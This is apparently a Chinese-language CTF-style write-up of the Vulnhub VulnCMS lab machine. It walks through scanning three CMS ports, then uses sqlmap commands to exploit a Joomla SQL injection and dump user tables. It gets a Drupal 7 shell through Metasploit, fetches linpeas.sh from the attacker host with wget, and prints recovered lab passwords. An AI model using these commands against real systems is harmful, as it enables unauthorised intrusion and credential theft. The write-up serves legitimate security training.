Vulnhub-VulnCMS
title: Vulnhub-VulnCMS
tags: Vulnhub
abbrlink: f37f8da4
date: 2022-12-19 09:42:41
存活
kali 192.168.169.220
靶机 192.168.169.230
靶机扫描
22 80 5000 8081 9001
访问
80
5000
8081
9001
三个端口都是cms系统
5000(Wordpress)、8081(Joomla)、和 9001(Drupal 7)
漏洞利用
80
- 首先扫一下目录
- 文件目录
发现两个疑似用户名:Mobley 和 Elloit,并且说了暴力破解没什么用。
5000 (Wordpress)
- 直接上
wpscan
扫描
wpscan --url http://192.168.169.230:5000/ -e u,p
- 没什么有用的价值
8081 (Joomla)
- 使用
Joomscan
扫一下
joomscan -u http://192.168.169.230:8081/
- 有个
sql注入
开始注入
sqlmap -u "http://192.168.169.230:8081//index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " --dbs --batch
sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" --tables --batch
sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" -T "hs23w_users" --columns --batch
sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=* " -D "joomla_db" -T "hs23w_users" -C "username,password,name,email" --dump --batch
导出信息
sqlmap -u "http://192.168.169.230:8081/index.php?option=com_contenthistory&view=history&list[ordering]= &item_id=75&type_id=1&list[select]=* " -D "joomla_db" -T "hs23w_users" --dump --dump-format html --batch
虽然密码加密,但是 email 列有一个看起来像密码
账户:elliot
密码:5T3e!_M0un7i@N
9001(Drupal 7)
- 上
msf
- 查看一些文件
- 有上面
sql
的信息,尝试ssh
提权
- kali利用Python开启http服务,靶机里下载脚本 linpeas.sh,获取信息
- 靶机使用
wget
下载
wget http://192.168.169.220/linpeas.sh
- 加权限,运行文件
tyrell
用户的密码mR_R0bo7_i5_R3@!_
登陆成功
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 putdown.top